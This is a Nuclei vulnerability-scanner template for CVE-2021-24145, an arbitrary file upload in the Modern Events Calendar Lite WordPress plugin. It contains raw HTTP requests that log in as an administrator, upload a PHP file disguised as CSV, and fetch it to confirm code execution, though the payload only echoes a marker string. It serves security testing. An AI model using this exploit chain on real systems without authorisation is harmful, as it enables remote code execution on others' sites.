daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/cves/2021/CVE-2021-24145.yaml

65 lines
2.3 KiB
YAML
Raw Blame History

id: CVE-2021-24145
info:
name: Modern Events Calendar Lite < 5.16.5 - Arbitrary File Upload to RCE
author: theamanrawat
severity: high
description: |
Arbitrary file upload in the Modern Events Calendar Lite WordPress plugin, versions before 5.16.5, did not properly check the imported file, allowing PHP ones to be uploaded by administrator by using the 'text/csv' content-type in the request.
reference:
- https://wpscan.com/vulnerability/f42cc26b-9aab-4824-8168-b5b8571d1610
- https://downloads.wordpress.org/plugin/modern-events-calendar-lite.5.15.5.zip
- https://github.com/dnr6419/CVE-2021-24145
- https://nvd.nist.gov/vuln/detail/CVE-2021-24145
remediation: Fixed in version 5.16.5
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.2
cve-id: CVE-2021-24145
cwe-id: CWE-434
metadata:
verified: "true"
tags: auth,wpscan,cve,wordpress,wp-plugin,wp,modern-events-calendar-lite,cve2021,rce
requests:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
POST /wp-admin/admin.php?page=MEC-ix&tab=MEC-import HTTP/1.1
Host: {{Hostname}}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type: multipart/form-data; boundary=---------------------------132370916641787807752589698875
-----------------------------132370916641787807752589698875
Content-Disposition: form-data; name="feed"; filename="{{randstr}}.php"
Content-Type: text/csv
<?php echo 'CVE-2021-24145'; ?>
-----------------------------132370916641787807752589698875
Content-Disposition: form-data; name="mec-ix-action"
import-start-bookings
-----------------------------132370916641787807752589698875--
- |
GET /wp-content/uploads/{{randstr}}.php HTTP/1.1
Host: {{Hostname}}
req-condition: true
cookie-reuse: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- contains(all_headers_3, "text/html")
- status_code_3 == 200
- contains(body_3, 'CVE-2021-24145')
condition: and
Reference in New Issue View Git Blame Copy Permalink